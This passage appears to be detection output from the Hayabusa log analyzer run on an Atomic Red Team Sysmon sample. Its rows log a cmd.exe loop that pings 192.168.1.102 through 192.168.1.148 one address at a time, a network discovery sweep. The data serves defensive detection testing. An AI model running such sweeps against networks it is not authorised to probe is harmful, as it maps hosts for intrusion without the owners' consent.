747F3D96-D929-5D31-0000-00109D593500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 
-w 100 192.168.1.102 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D929-5D31-0000-00108A5C3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.103 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D929-5D31-0000-0010765F3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.104 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3700 | PGUID: 747F3D96-D92A-5D31-0000-001062623500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.105 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2852 | PGUID: 747F3D96-D92B-5D31-0000-0010296B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:27.493 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.106 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6484 | PGUID: 747F3D96-D92B-5D31-0000-00108D6E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.107 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5400 | PGUID: 747F3D96-D92C-5D31-0000-00107A713500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.108 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3452 | PGUID: 747F3D96-D92C-5D31-0000-001072743500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.109 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4468 | PGUID: 
747F3D96-D92D-5D31-0000-001068773500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.110 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4320 | PGUID: 747F3D96-D92D-5D31-0000-0010787A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.111 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3952 | PGUID: 747F3D96-D92E-5D31-0000-0010787D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.112 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6148 | PGUID: 747F3D96-D92E-5D31-0000-001091803500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.113 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | 
LID: 0x50951 | PID: 3800 | PGUID: 747F3D96-D92F-5D31-0000-00109C833500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.114 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1324 | PGUID: 747F3D96-D92F-5D31-0000-0010478A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.115 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3268 | PGUID: 747F3D96-D92F-5D31-0000-00109A973500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.116 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D930-5D31-0000-0010879A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.117 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do 
ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4996 | PGUID: 747F3D96-D931-5D31-0000-00108F9D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.118 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2460 | PGUID: 747F3D96-D931-5D31-0000-0010A9A03500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.119 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D931-5D31-0000-00105CA63500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.120 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D932-5D31-0000-001057A93500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.121 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5832 | PGUID: 747F3D96-D933-5D31-0000-001062AC3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.122 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D933-5D31-0000-001098AF3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.123 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 208 | PGUID: 747F3D96-D933-5D31-0000-0010B6B23500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.124 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2600 | PGUID: 747F3D96-D934-5D31-0000-0010A3B53500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.125 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-D934-5D31-0000-00106ABE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.126 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3356 | PGUID: 747F3D96-D935-5D31-0000-001056C13500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.127 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5004 | PGUID: 747F3D96-D935-5D31-0000-001042C43500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.128 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3964 | PGUID: 747F3D96-D936-5D31-0000-00102EC73500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.129 | Process: 
C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6540 | PGUID: 747F3D96-D936-5D31-0000-001075CA3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.130 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4324 | PGUID: 747F3D96-D937-5D31-0000-001066CD3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.131 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D938-5D31-0000-001072D03500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.132 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D938-5D31-0000-00105ED33500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 
-w 100 192.168.1.133 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D938-5D31-0000-00101EDC3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.134 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1816 | PGUID: 747F3D96-D939-5D31-0000-001090E23500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.135 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3320 | PGUID: 747F3D96-D939-5D31-0000-001072EB3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.136 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4540 | PGUID: 747F3D96-D93A-5D31-0000-001073EE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:42.881 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.137 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-D93A-5D31-0000-00105FF83500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.138 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1248 | PGUID: 747F3D96-D93B-5D31-0000-001085FB3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.139 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6740 | PGUID: 747F3D96-D93B-5D31-0000-001092FE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.140 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 
747F3D96-D93C-5D31-0000-0010B5053600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.141 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D93C-5D31-0000-0010B1083600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.142 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D93D-5D31-0000-0010A20B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.143 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D93D-5D31-0000-0010910E3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.144 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | 
LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D93E-5D31-0000-00107E113600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.145 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D93E-5D31-0000-0010FC153600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.146 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D93F-5D31-0000-001041203600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.147 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D93F-5D31-0000-001061233600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.148 | Process: 